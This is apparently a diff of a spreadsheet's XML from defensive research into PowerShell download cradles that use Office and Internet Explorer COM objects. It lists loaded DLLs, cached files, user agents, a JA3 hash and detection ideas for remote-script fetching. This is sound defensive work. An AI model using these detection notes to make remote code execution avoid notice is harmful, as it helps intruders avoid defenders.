+Network Store Information RPC interface - C:\Windows\System32\winnsi.dll
+</t>
+    </r>
+    <r>
+      <rPr>
+        <b/>
+        <sz val="12"/>
+        <color theme="1"/>
+        <rFont val="Calibri"/>
+        <family val="2"/>
+        <scheme val="minor"/>
+      </rPr>
+      <t xml:space="preserve">
+iexplore.exe  loads additional modules:
+</t>
+    </r>
+    <r>
+      <rPr>
+        <sz val="10"/>
+        <color theme="1"/>
+        <rFont val="Calibri (Body)_x0000_"/>
+      </rPr>
+      <t xml:space="preserve">Credential Vault Client Library - C:\Windows\SysWOW64\vaultcli.dll
+</t>
+    </r>
+    <r>
+      <rPr>
+        <b/>
+        <sz val="10"/>
+        <color theme="1"/>
+        <rFont val="Calibri (Body)_x0000_"/>
+      </rPr>
+      <t>MSXML 6.0 - C:\Windows\SysWOW64\msxml6.dll</t>
+    </r>
+    <r>
+      <rPr>
+        <sz val="10"/>
+        <color theme="1"/>
+        <rFont val="Calibri (Body)_x0000_"/>
+      </rPr>
+      <t xml:space="preserve">
+</t>
+    </r>
+  </si>
+  <si>
+    <r>
+      <rPr>
+        <b/>
+        <sz val="12"/>
+        <color theme="1"/>
+        <rFont val="Calibri (Body)_x0000_"/>
+      </rPr>
+      <t xml:space="preserve">Iexplore.exe writes:
+</t>
+    </r>
+    <r>
+      <rPr>
+        <sz val="12"/>
+        <color theme="1"/>
+        <rFont val="Calibri (Body)_x0000_"/>
+      </rPr>
+      <t>C:\Users\&lt;USER&gt;\AppData\*\Temporary Internet Files\*
+e.g
+C:\Users\Administrator.DFIR\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4CXURQSD\test[1].txt
+C:\Users\Administrator.DFIR\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\139RVK4W\test[1].ps1</t>
+    </r>
+  </si>
+  <si>
+    <r>
+      <rPr>
+        <b/>
+        <sz val="12"/>
+        <color theme="1"/>
+        <rFont val="Calibri"/>
+        <family val="2"/>
+        <scheme val="minor"/>
+      </rPr>
+      <t>Winword.exe writes:</t>
+    </r>
+    <r>
+      <rPr>
+        <sz val="12"/>
+        <color theme="1"/>
+        <rFont val="Calibri"/>
+        <family val="2"/>
+        <scheme val="minor"/>
+      </rPr>
+      <t xml:space="preserve">
+</t>
+    </r>
+    <r>
+      <rPr>
+        <b/>
+        <sz val="12"/>
+        <color theme="1"/>
+        <rFont val="Calibri (Body)_x0000_"/>
+      </rPr>
+      <t>C:\Users\&lt;USER&gt;\AppData\Roaming\Microsoft\*\Recent\*.url</t>
+    </r>
+    <r>
+      <rPr>
+        <sz val="12"/>
+        <color theme="1"/>
+        <rFont val="Calibri (Body)_x0000_"/>
+      </rPr>
+      <t xml:space="preserve">
+C:\Users\&lt;USER&gt;\AppData\*\Temporary Internet Files\*
+e.g
+</t>
+    </r>
+    <r>
+      <rPr>
+        <sz val="10"/>
+        <color theme="1"/>
+        <rFont val="Calibri (Body)_x0000_"/>
+      </rPr>
+      <t>C:\Users\Administrator.DFIR\AppData\Roaming\Microsoft\Office\Recent\master on raw.githubusercontent.com.url
+C:\Users\Administrator.DFIR\AppData\Roaming\Microsoft\Office\Recent\test.ps1.url
+C:\Users\Administrator.DFIR\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{8FBE9728-3734-49D6-BAD7-3229A205BA29}.tmp
+C:\Users\Administrator.DFIR\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRD0000.doc
+C:\Users\Administrator.DFIR\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\C99E1E88.ps1
+C:\Users\ADMINI~1.DFI\AppData\Local\Temp\JETD3BB.tmp
+C:\Users\Administrator.DFIR\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{E00D4C6D-B039-4EB3-AE43-4C91C7B21FD7}.tmp
+C:\Users\Administrator.DFIR\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
+C:\Users\ADMINI~1.DFI\AppData\Local\Temp\CVRD283.tmp</t>
+    </r>
+  </si>
+  <si>
+    <r>
+      <rPr>
+        <b/>
+        <sz val="12"/>
+        <color theme="1"/>
+        <rFont val="Calibri"/>
+        <family val="2"/>
+        <scheme val="minor"/>
+      </rPr>
+      <t xml:space="preserve">Winword.exe writes:
+C:\Users\&lt;USER&gt;\AppData\Roaming\Microsoft\*\Recent\*.url
+</t>
+    </r>
+    <r>
+      <rPr>
+        <sz val="12"/>
+        <color theme="1"/>
+        <rFont val="Calibri"/>
+        <family val="2"/>
+        <scheme val="minor"/>
+      </rPr>
+      <t>C:\Users\&lt;USER&gt;\AppData\*\INetCache\*</t>
+    </r>
+    <r>
+      <rPr>
+        <b/>
+        <sz val="12"/>
+        <color theme="1"/>
+        <rFont val="Calibri"/>
+        <family val="2"/>
+        <scheme val="minor"/>
+      </rPr>
+      <t xml:space="preserve">
+</t>
+    </r>
+    <r>
+      <rPr>
+        <sz val="12"/>
+        <color theme="1"/>
+        <rFont val="Calibri"/>
+        <family val="2"/>
+        <scheme val="minor"/>
+      </rPr>
+      <t xml:space="preserve">
+e.g
+</t>
+    </r>
+    <r>
+      <rPr>
+        <sz val="10"/>
+        <color theme="1"/>
+        <rFont val="Calibri (Body)_x0000_"/>
+      </rPr>
+      <t>C:\Users\MATTHE~1\AppData\Local\Temp\aria-debug-8368.log
+C:\Users\MATTHE~1\AppData\Local\Temp\VBE
+C:\Users\Matthew Green\AppData\Local\Microsoft\Windows\INetCache\Content.Word\~WRF{CD193017-1523-4CD3-84F9-581FFF465EA0}.tmp
+C:\Users\Matthew Green\AppData\Roaming\Microsoft\Office\Recent\payloads on raw.githubusercontent.com.url
+C:\Users\Matthew Green\AppData\Roaming\Microsoft\Office\Recent\index.dat
+C:\Users\Matthew Green\AppData\Roaming\Microsoft\Office\Recent\test.ps1.url
+C:\Users\Matthew Green\AppData\Roaming\Microsoft\Office\Recent
+C:\Users\Matthew Green\AppData\Local\Microsoft\Windows\INetCache\Content.Word\~WRS{6DBB2AE2-4A16-4E93-80D1-5F9FA2FB31DE}.tmp
+C:\Users\Matthew Green\AppData\Local\Microsoft\Windows\INetCache\Content.Word\~WRD0000.doc
+C:\Users\Matthew Green\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\F526CF96.ps1
+C:\Users\Matthew Green\AppData\Local\Microsoft\Windows\INetCache\IE\JTJM57VR\test[1].ps1
+C:\Users\Matthew Green\AppData\Local\Microsoft\Windows\INetCache\IE\JTJM57VR
+C:\Users\Matthew Green\AppData\Local\Microsoft\Windows\INetCache\Content.MSO
+C:\Users\MATTHE~1\AppData\Local\Temp\JET3ABD.tmp
+C:\Users\Matthew Green\AppData\Local\Microsoft\Windows\INetCache\Content.Word\~WRS{C3478927-80DA-46AB-B6DE-055586390882}.tmp
+C:\Users\Matthew Green\AppData\Local\Microsoft\Windows\INetCache\Content.Word
+C:\Users\Matthew Green\AppData\Local\Microsoft\Windows\INetCache\IE
+C:\Users\MATTHE~1\AppData\Local\Temp\{1D2C704E-EA5A-4DBC-B740-EC1AF010BC70} - OProcSessId.dat</t>
+    </r>
+  </si>
+  <si>
+    <t>JA3_footprint: 771,49196-49195-49200-49199-159-158-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-5-10-11-13-35-23-65281,29-23-24,0
+JA3_hash: ce5f3254611a8c095a3d821d44539877</t>
+  </si>
+  <si>
+    <r>
+      <rPr>
+        <b/>
+        <sz val="12"/>
+        <color theme="1"/>
+        <rFont val="Calibri"/>
+        <family val="2"/>
+        <scheme val="minor"/>
+      </rPr>
+      <t xml:space="preserve">Powershell.exe loads additional modules: </t>
+    </r>
+    <r>
+      <rPr>
+        <b/>
+        <i/>
+        <sz val="12"/>
+        <color theme="1"/>
+        <rFont val="Calibri"/>
+        <family val="2"/>
+        <scheme val="minor"/>
+      </rPr>
+      <t xml:space="preserve">**NO RASMAN or RASAPI32
+</t>
+    </r>
+    <r>
+      <rPr>
+        <sz val="10"/>
+        <color theme="1"/>
+        <rFont val="Calibri (Body)_x0000_"/>
+      </rPr>
+      <t xml:space="preserve">.NET Framework - C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Confe64a9051#\ea931e4f660df414bb43822d70c9c9fb\System.Configuration.Install.ni.dll
+.NET Framework - C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\2e6ad675e5f9e923284877dd42f58f75\System.Core.ni.dll
+.NET Framework - C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Data\8d3ff0c32bb1ae109d1ac9f6c4caa4bf\System.Data.ni.dll
+.NET Framework - C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Dired13b18a9#\c3ffb5546a75f99a8d7293db710d1c24\System.DirectoryServices.ni.dll
+.NET Framework - C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Management\a1f92e5e985f95bc5f212f8ff05c5c1a\System.Management.ni.dll
+.NET Framework - C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Numerics\e7dc7f4504ef24ad3922aae3e9aa2d24\System.Numerics.ni.dll
+.NET Framework - C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Transactions\1ed4ddbd8685d327bfdd39bab521366c\System.Transactions.ni.dll
+.NET Framework - C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\2f52ca6330aa92554abf777e2b7d6783\System.Xml.ni.dll
+.NET Framework - C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d41b66a8a5dde18b54c79b7b42b5c951\System.ni.dll
+DHCP Client Service - C:\Windows\System32\dhcpcsvc.dll
+DHCPv6 Client - C:\Windows\System32\dhcpcsvc6.dll
+</t>
+    </r>
+    <r>
+      <rPr>
+        <b/>
+        <sz val="10"/>
+        <color theme="1"/>
+        <rFont val="Calibri (Body)_x0000_"/>
+      </rPr>
+      <t>DNS Client API DLL - C:\Windows\System32\dnsapi.dll</t>
+    </r>
+    <r>
+      <rPr>
+        <sz val="10"/>
+        <color theme="1"/>
+        <rFont val="Calibri (Body)_x0000_"/>
+      </rPr>
+      <t xml:space="preserve">
+Data Protection API - C:\Windows\System32\dpapi.dll
+FWP/IPsec User-Mode API - C:\Windows\System32\FWPUCLNT.DLL
+Fusion 2.5 - C:\Windows\System32\sxs.dll
+IP Helper API - C:\Windows\System32\IPHLPAPI.DLL
+</t>
+    </r>
+    <r>
+      <rPr>
+        <b/>
+        <sz val="10"/>
+        <color theme="1"/>
+        <rFont val="Calibri (Body)_x0000_"/>
+      </rPr>
+      <t>MSXML 3.0 - C:\Windows\System32\msxml3.dll</t>
+    </r>
+    <r>
+      <rPr>
+        <sz val="10"/>
+        <color theme="1"/>
+        <rFont val="Calibri (Body)_x0000_"/>
+      </rPr>
+      <t xml:space="preserve">
+Microsoft ASN.1 API - C:\Windows\System32\ntasn1.dll
+Microsoft Key Protection Provider - C:\Windows\System32\mskeyprotect.dll
+Microsoft SChannel Provider - C:\Windows\System32\ncryptsslp.dll
+Microsoft Windows PowerShell Management Commands - C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P6f792626#\87dc8856a52ea55a6bf9698664257e01\Microsoft.PowerShell.Security.ni.dll
+Microsoft Windows PowerShell Utility Commands - C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P521220ea#\3a5dc2caf55d763e630aa7e89c43dabb\Microsoft.PowerShell.Commands.Utility.ni.dll
+Microsoft Windows Sockets 2.0 Service Provider - C:\Windows\System32\mswsock.dll
+Microsoft.PowerShell.ConsoleHost - C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pb378ec07#\803c6cc06ee5ddc93de3a601c7368bb9\Microsoft.PowerShell.ConsoleHost.ni.dll
+Multi Language Support DLL - C:\Windows\System32\mlang.dll
+NSI User-mode interface DLL - C:\Windows\System32\nsi.dll
+Network Store Information RPC interface - C:\Windows\System32\winnsi.dll
+On Demand Connctiond Route Helper - C:\Windows\System32\OnDemandConnRouteHelper.dll
+Remote Access AutoDial Helper - C:\Windows\System32\rasadhlp.dll
+System.Configuration.dll - C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\303d455e2eac7725610cd55c8170ba00\System.Configuration.ni.dll
+System.Management.Automation - C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\7d16fda968d94b857be65dd8539a562a\System.Management.Automation.ni.dll
+TLS / SSL Security Provider - C:\Windows\System32\schannel.dll
+Web Transfer Protocols API - C:\Windows\System32\webio.dll
+Windows COM interface for WinHttp - C:\Windows\System32\winhttpcom.dll
+</t>
+    </r>
+    <r>
+      <rPr>
+        <b/>
+        <sz val="10"/>
+        <color theme="1"/>
+        <rFont val="Calibri (Body)_x0000_"/>
+      </rPr>
+      <t xml:space="preserve">Windows HTTP Services - C:\Windows\System32\winhttp.dll
+</t>
+    </r>
+    <r>
+      <rPr>
+        <sz val="10"/>
+        <color theme="1"/>
+        <rFont val="Calibri (Body)_x0000_"/>
+      </rPr>
+      <t>Windows NCrypt Router - C:\Windows\System32\ncrypt.dll
+cs - C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Mf49f6405#\a12bb8857bac428f3891c2cad3b8bc14\Microsoft.Management.Infrastructure.ni.dll</t>
+    </r>
+  </si>
+  <si>
+    <r>
+      <rPr>
+        <b/>
+        <sz val="12"/>
+        <color theme="1"/>
+        <rFont val="Calibri"/>
+        <family val="2"/>
+        <scheme val="minor"/>
+      </rPr>
+      <t xml:space="preserve">Powershell.exe loads additional modules: </t>
+    </r>
+    <r>
+      <rPr>
+        <b/>
+        <i/>
+        <sz val="12"/>
+        <color theme="1"/>
+        <rFont val="Calibri"/>
+        <family val="2"/>
+        <scheme val="minor"/>
+      </rPr>
+      <t>**NO RASMAN or RASAPI32</t>
+    </r>
+    <r>
+      <rPr>
+        <sz val="12"/>
+        <color theme="1"/>
+        <rFont val="Calibri"/>
+        <family val="2"/>
+        <scheme val="minor"/>
+      </rPr>
+      <t xml:space="preserve">
+</t>
+    </r>
+    <r>
+      <rPr>
+        <sz val="10"/>
+        <color theme="1"/>
+        <rFont val="Calibri (Body)_x0000_"/>
+      </rPr>
+      <t xml:space="preserve">.NET Framework - C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Confe64a9051#\d53f84c7624fb9b2b17bbad0a38644f8\System.Configuration.Install.ni.dll
+DHCP Client Service - C:\Windows\System32\dhcpcsvc.dll
+DHCPv6 Client - C:\Windows\System32\dhcpcsvc6.dll
+</t>
+    </r>
+    <r>
+      <rPr>
+        <b/>
+        <sz val="10"/>
+        <color theme="1"/>
+        <rFont val="Calibri (Body)_x0000_"/>
+      </rPr>
+      <t>DNS Client API DLL - C:\Windows\System32\dnsapi.dll</t>
+    </r>
+    <r>
+      <rPr>
+        <sz val="10"/>
+        <color theme="1"/>
+        <rFont val="Calibri (Body)_x0000_"/>
+      </rPr>
+      <t xml:space="preserve">
+Data Protection API - C:\Windows\System32\dpapi.dll
+FWP/IPsec User-Mode API - C:\Windows\System32\FWPUCLNT.DLL
+Fusion 2.5 - C:\Windows\System32\sxs.dll
+IP Helper API - C:\Windows\System32\IPHLPAPI.DLL
+</t>
+    </r>
+    <r>
+      <rPr>
+        <b/>
+        <sz val="10"/>
+        <color theme="1"/>
+        <rFont val="Calibri (Body)_x0000_"/>
+      </rPr>
+      <t>MSXML 3.0 - C:\Windows\System32\msxml3.dll</t>
+    </r>
+    <r>
+      <rPr>
+        <sz val="10"/>
+        <color theme="1"/>
+        <rFont val="Calibri (Body)_x0000_"/>
+      </rPr>
+      <t xml:space="preserve">
+Microsoft SChannel Provider - C:\Windows\System32\ncryptsslp.dll
+Microsoft Windows PowerShell Utility Commands - C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P521220ea#\b4a348f448f7da786d8f78e76bbb28a0\Microsoft.PowerShell.Commands.Utility.ni.dll
+Microsoft Windows Sockets 2.0 Service Provider - C:\Windows\System32\mswsock.dll
+Multi Language Support DLL - C:\Windows\System32\mlang.dll
+Network Store Information RPC interface - C:\Windows\System32\winnsi.dll
+Remote Access AutoDial Helper - C:\Windows\System32\rasadhlp.dll
+TLS / SSL Security Provider - C:\Windows\System32\schannel.dll
+Web Transfer Protocols API - C:\Windows\System32\webio.dll
+</t>
+    </r>
+    <r>
+      <rPr>
+        <b/>
+        <sz val="10"/>
+        <color theme="1"/>
+        <rFont val="Calibri (Body)_x0000_"/>
+      </rPr>
+      <t>Windows HTTP Services - C:\Windows\System32\winhttp.dll</t>
+    </r>
+  </si>
+  <si>
+    <r>
+      <t xml:space="preserve">Powershell.exe loads: **NO RASMAN or RASAPI32
+</t>
+    </r>
+    <r>
+      <rPr>
+        <sz val="10"/>
+        <color theme="1"/>
+        <rFont val="Calibri (Body)_x0000_"/>
+      </rPr>
+      <t xml:space="preserve">Credential Delegation Security Package - C:\Windows\System32\credssp.dll
+</t>
+    </r>
+    <r>
+      <rPr>
+        <b/>
+        <sz val="10"/>
+        <color theme="1"/>
+        <rFont val="Calibri (Body)_x0000_"/>
+      </rPr>
+      <t>DNS Client API DLL - C:\Windows\System32\dnsapi.dll</t>
+    </r>
+    <r>
+      <rPr>
+        <sz val="10"/>
+        <color theme="1"/>
+        <rFont val="Calibri (Body)_x0000_"/>
+      </rPr>
+      <t xml:space="preserve">
+FWP/IPsec User-Mode API - C:\Windows\System32\FWPUCLNT.DLL
+Fusion 2.5 - C:\Windows\System32\sxs.dll
+Group Policy Client API - C:\Windows\System32\gpapi.dll
+IP Helper API - C:\Windows\System32\IPHLPAPI.DLL
+</t>
+    </r>
+    <r>
+      <rPr>
+        <b/>
+        <sz val="10"/>
+        <color theme="1"/>
+        <rFont val="Calibri (Body)_x0000_"/>
+      </rPr>
+      <t xml:space="preserve">MSXML 3.0 SP11 - C:\Windows\System32\msxml3.dll
+</t>
+    </r>
+    <r>
+      <rPr>
+        <sz val="10"/>
+        <color theme="1"/>
+        <rFont val="Calibri (Body)_x0000_"/>
+      </rPr>
+      <t xml:space="preserve">Microsoft Windows Sockets 2.0 Service Provider - C:\Windows\System32\mswsock.dll
+Net Win32 API Helpers DLL - C:\Windows\System32\netutils.dll
+Network Store Information RPC interface - C:\Windows\System32\winnsi.dll
+Remote Access AutoDial Helper - C:\Windows\System32\rasadhlp.dll
+Remote RPC Extension - C:\Windows\System32\RpcRtRemote.dll
+TLS / SSL Security Provider - C:\Windows\System32\schannel.dll
+Web Transfer Protocols API - C:\Windows\System32\webio.dll
+Windows Cryptographic Primitives Library - C:\Windows\System32\bcrypt.dll
+Windows Cryptographic Primitives Library - C:\Windows\System32\bcryptprimitives.dll
+</t>
+    </r>
+    <r>
+      <rPr>
+        <b/>
+        <sz val="10"/>
+        <color theme="1"/>
+        <rFont val="Calibri (Body)_x0000_"/>
+      </rPr>
+      <t>Windows HTTP Services - C:\Windows\System32\winhttp.dll</t>
+    </r>
+    <r>
+      <rPr>
+        <sz val="10"/>
+        <color theme="1"/>
+        <rFont val="Calibri (Body)_x0000_"/>
+      </rPr>
+      <t xml:space="preserve">
+Windows cryptographic library - C:\Windows\System32\ncrypt.dll
+Winsock2 Helper DLL (TL/IPv4) - C:\Windows\System32\WSHTCPIP.DLL
+Winsock2 Helper DLL (TL/IPv6) - C:\Windows\System32\wship6.dll</t>
+    </r>
+  </si>
+  <si>
+    <r>
+      <rPr>
+        <b/>
+        <sz val="12"/>
+        <color theme="1"/>
+        <rFont val="Calibri"/>
+        <family val="2"/>
+        <scheme val="minor"/>
+      </rPr>
+      <t xml:space="preserve">Endpoint:
+</t>
+    </r>
+    <r>
+      <rPr>
+        <sz val="12"/>
+        <color theme="1"/>
+        <rFont val="Calibri"/>
+        <family val="2"/>
+        <scheme val="minor"/>
+      </rPr>
+      <t xml:space="preserve">Powershell.exe loads some network dlls but there does not seem to be common accross versions.
+Svchost parent to word.exe &gt; word.exe connects to internet &gt; word.exe writes .url files
+</t>
+    </r>
+    <r>
+      <rPr>
+        <b/>
+        <sz val="12"/>
+        <color theme="1"/>
+        <rFont val="Calibri"/>
+        <family val="2"/>
+        <scheme val="minor"/>
+      </rPr>
+      <t xml:space="preserve">Network:
+</t>
+    </r>
+    <r>
+      <rPr>
+        <sz val="12"/>
+        <color theme="1"/>
+        <rFont val="Calibri"/>
+        <family val="2"/>
+        <scheme val="minor"/>
+      </rPr>
+      <t>Several Useragents and http methods. Good detection filter on bucketting methods by URL over 5-10 seconds and  alerting on unusual downloads. Can be merged with COMexcel to focus on generic COMoffice detection.
+OPTIONS: Microsoft Office Word *
+HEAD: Microsoft Office Word *
+HEAD: Microsoft Office Existence Discovery
+GET: Mozilla/* (compatible; MSIE *; Windows NT *; Trident/*; .NET*; .NET CLR *; ms-office; MSOffice *)</t>
+    </r>
+  </si>
+  <si>
+    <r>
+      <rPr>
+        <b/>
+        <sz val="12"/>
+        <color theme="1"/>
+        <rFont val="Calibri"/>
+        <family val="2"/>
+        <scheme val="minor"/>
+      </rPr>
+      <t xml:space="preserve">Endpoint:
+</t>
+    </r>
+    <r>
+      <rPr>
+        <sz val="12"/>
+        <color theme="1"/>
+        <rFont val="Calibri"/>
+        <family val="2"/>
+        <scheme val="minor"/>
+      </rPr>
+      <t xml:space="preserve">Powershell.exe loads some network dlls
+Svchost parent to excel.exe &gt; excel.exe connects to internet. 
+Excel writes .url files to C:\Users\&lt;USER&gt;\AppData\Roaming\Microsoft\*\Recent\*.url
+</t>
+    </r>
+    <r>
+      <rPr>
+        <b/>
+        <sz val="12"/>
+        <color theme="1"/>
+        <rFont val="Calibri"/>
+        <family val="2"/>
+        <scheme val="minor"/>
+      </rPr>
+      <t xml:space="preserve">Network:
+</t>
+    </r>
+    <r>
+      <rPr>
+        <sz val="12"/>
+        <color theme="1"/>
+        <rFont val="Calibri"/>
+        <family val="2"/>
+        <scheme val="minor"/>
+      </rPr>
+      <t>Several Useragents and http methods. Good detection filter on bucketting methods by URL over 5-10 seconds and  alerting on unusual downloads. Can be merged with COMWord to focus on generic COMoffice detection.
+OPTIONS: Microsoft Office Excel *
+HEAD: Microsoft Office Excel *
+HEAD: Microsoft Office Existence Discovery
+GET: Mozilla/* (compatible; MSIE *; Windows NT *; Trident/*; .NET*; .NET CLR *; ms-office; MSOffice *)"</t>
+    </r>
+  </si>
+  <si>
+    <r>
+      <rPr>
+        <b/>
+        <sz val="12"/>
+        <color theme="1"/>
+        <rFont val="Calibri"/>
+        <family val="2"/>
+        <scheme val="minor"/>
+      </rPr>
+      <t>Endpoint:</t>
+    </r>
+    <r>
+      <rPr>
+        <sz val="12"/>
+        <color theme="1"/>
+        <rFont val="Calibri"/>
+        <family val="2"/>
+        <scheme val="minor"/>
+      </rPr>
+      <t xml:space="preserve">
+Powershell loads ieproxy.dll.
+Svchost parent to iexplore.exe &gt; iexplore.exe parent to x86 iexplore.exe &gt; x86 Iexplore.exe connects to internet.
+POWERSHELL.EXE-*.pf entries with  ieproxy.dll entry.</t>
+    </r>
+  </si>
+  <si>
+    <t>The fact that PowerShell MsXml COM Object interactions is not proxy aware mens this is low priorty to consider detection
+Generic detection of Powershell.exe reaching out to the internet.
+Powershell.exe loading common network modules: dnsapi.dll or winhttp.dll</t>
+  </si>
+  <si>
+    <r>
+      <rPr>
+        <b/>
+        <sz val="12"/>
+        <color theme="1"/>
+        <rFont val="Calibri"/>
+        <family val="2"/>
+        <scheme val="minor"/>
+      </rPr>
+      <t>Powershell.exe loads additional modules:</t>
+    </r>
+    <r>
+      <rPr>
+        <sz val="12"/>
+        <color theme="1"/>
+        <rFont val="Calibri"/>
+        <family val="2"/>
+        <scheme val="minor"/>
+      </rPr>
+      <t xml:space="preserve"> **NO RASMAN or RASAPI32
+</t>
+    </r>
+    <r>
+      <rPr>
+        <sz val="10"/>
+        <color theme="1"/>
+        <rFont val="Calibri (Body)_x0000_"/>
+      </rPr>
+      <t xml:space="preserve">.NET Framework - C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Confe64a9051#\d53f84c7624fb9b2b17bbad0a38644f8\System.Configuration.Install.ni.dll
+DHCP Client Service - C:\Windows\System32\dhcpcsvc.dll
+DHCPv6 Client - C:\Windows\System32\dhcpcsvc6.dll
+</t>
+    </r>
+    <r>
+      <rPr>
+        <b/>
+        <sz val="10"/>
+        <color theme="1"/>
+        <rFont val="Calibri (Body)_x0000_"/>
+      </rPr>
+      <t>DNS Client API DLL - C:\Windows\System32\dnsapi.dll</t>
+    </r>
+    <r>
+      <rPr>
+        <sz val="10"/>
+        <color theme="1"/>
+        <rFont val="Calibri (Body)_x0000_"/>
+      </rPr>
+      <t xml:space="preserve">
+Data Protection API - C:\Windows\System32\dpapi.dll
+FWP/IPsec User-Mode API - C:\Windows\System32\FWPUCLNT.DLL
+Fusion 2.5 - C:\Windows\System32\sxs.dll
+IP Helper API - C:\Windows\System32\IPHLPAPI.DLL
+Microsoft SChannel Provider - C:\Windows\System32\ncryptsslp.dll
+Microsoft Windows PowerShell Utility Commands - C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P521220ea#\b4a348f448f7da786d8f78e76bbb28a0\Microsoft.PowerShell.Commands.Utility.ni.dll
+Microsoft Windows Sockets 2.0 Service Provider - C:\Windows\System32\mswsock.dll
+Multi Language Support DLL - C:\Windows\System32\mlang.dll
+Network Store Information RPC interface - C:\Windows\System32\winnsi.dll
+Remote Access AutoDial Helper - C:\Windows\System32\rasadhlp.dll
+TLS / SSL Security Provider - C:\Windows\System32\schannel.dll
+Web Transfer Protocols API - C:\Windows\System32\webio.dll
+</t>
+    </r>
+    <r>
+      <rPr>
+        <b/>
+        <sz val="10"/>
+        <color theme="1"/>
+        <rFont val="Calibri (Body)_x0000_"/>
+      </rPr>
+      <t>Windows HTTP Services - C:\Windows\System32\winhttp.dll</t>
+    </r>
+  </si>
+  <si>
+    <r>
+      <rPr>
+        <b/>
+        <sz val="12"/>
+        <color theme="1"/>
+        <rFont val="Calibri"/>
+        <family val="2"/>
+        <scheme val="minor"/>
+      </rPr>
+      <t>Powershell.exe loads: **NO RASMAN or RASAPI32</t>
+    </r>
+    <r>
+      <rPr>
+        <sz val="12"/>
+        <color theme="1"/>
+        <rFont val="Calibri"/>
+        <family val="2"/>
+        <scheme val="minor"/>
+      </rPr>
+      <t xml:space="preserve">
+</t>
+    </r>
+    <r>
+      <rPr>
+        <sz val="10"/>
+        <color theme="1"/>
+        <rFont val="Calibri (Body)_x0000_"/>
+      </rPr>
+      <t xml:space="preserve">Credential Delegation Security Package - C:\Windows\System32\credssp.dll
+</t>
+    </r>
+    <r>
+      <rPr>
+        <b/>
+        <sz val="10"/>
+        <color theme="1"/>
+        <rFont val="Calibri (Body)_x0000_"/>
+      </rPr>
+      <t>DNS Client API DLL - C:\Windows\System32\dnsapi.dll</t>
+    </r>
+    <r>
+      <rPr>
+        <sz val="10"/>
+        <color theme="1"/>
+        <rFont val="Calibri (Body)_x0000_"/>
+      </rPr>
+      <t xml:space="preserve">
+FWP/IPsec User-Mode API - C:\Windows\System32\FWPUCLNT.DLL
+Fusion 2.5 - C:\Windows\System32\sxs.dll
+Group Policy Client API - C:\Windows\System32\gpapi.dll
+IP Helper API - C:\Windows\System32\IPHLPAPI.DLL
+Microsoft Windows Sockets 2.0 Service Provider - C:\Windows\System32\mswsock.dll
+Multi Language Support DLL - C:\Windows\System32\mlang.dll
+Network Store Information RPC interface - C:\Windows\System32\winnsi.dll
+Remote Access AutoDial Helper - C:\Windows\System32\rasadhlp.dll
+Remote RPC Extension - C:\Windows\System32\RpcRtRemote.dll
+TLS / SSL Security Provider - C:\Windows\System32\schannel.dll
+Web Transfer Protocols API - C:\Windows\System32\webio.dll
+Windows Cryptographic Primitives Library - C:\Windows\System32\bcrypt.dll
+Windows Cryptographic Primitives Library - C:\Windows\System32\bcryptprimitives.dll
+</t>
+    </r>
+    <r>
+      <rPr>
+        <b/>
+        <sz val="10"/>
+        <color theme="1"/>
+        <rFont val="Calibri (Body)_x0000_"/>
+      </rPr>
+      <t xml:space="preserve">Windows HTTP Services - C:\Windows\System32\winhttp.dll
+</t>
+    </r>
+    <r>
+      <rPr>
+        <sz val="10"/>
+        <color theme="1"/>
+        <rFont val="Calibri (Body)_x0000_"/>
+      </rPr>
+      <t>Windows cryptographic library - C:\Windows\System32\ncrypt.dll
+Winsock2 Helper DLL (TL/IPv4) - C:\Windows\System32\WSHTCPIP.DLL
+Winsock2 Helper DLL (TL/IPv6) - C:\Windows\System32\wship6.dll</t>
+    </r>
+  </si>
+  <si>
+    <r>
+      <rPr>
+        <b/>
+        <sz val="12"/>
+        <color theme="1"/>
+        <rFont val="Calibri"/>
+        <family val="2"/>
+        <scheme val="minor"/>
+      </rPr>
+      <t xml:space="preserve">Powershell.exe loads additional modules: </t>
+    </r>
+    <r>
+      <rPr>
+        <sz val="12"/>
+        <color theme="1"/>
+        <rFont val="Calibri"/>
+        <family val="2"/>
+        <scheme val="minor"/>
+      </rPr>
+      <t xml:space="preserve">**NO RASMAN or RASAPI32
+</t>
+    </r>
+    <r>
+      <rPr>
+        <sz val="10"/>
+        <color theme="1"/>
+        <rFont val="Calibri (Body)_x0000_"/>
+      </rPr>
+      <t xml:space="preserve">Data Protection API - C:\Windows\System32\dpapi.dll
+DHCP Client Service - C:\Windows\System32\dhcpcsvc.dll
+DHCPv6 Client - C:\Windows\System32\dhcpcsvc6.dll
+Multi Language Support DLL - C:\Windows\System32\mlang.dll
+Microsoft SChannel Provider - C:\Windows\System32\ncryptsslp.dll
+Microsoft ASN.1 API - C:\Windows\System32\ntasn1.dll
+Windows NCrypt Router - C:\Windows\System32\ncrypt.dll
+Microsoft Key Protection Provider - C:\Windows\System32\mskeyprotect.dll
+TLS / SSL Security Provider - C:\Windows\System32\schannel.dll
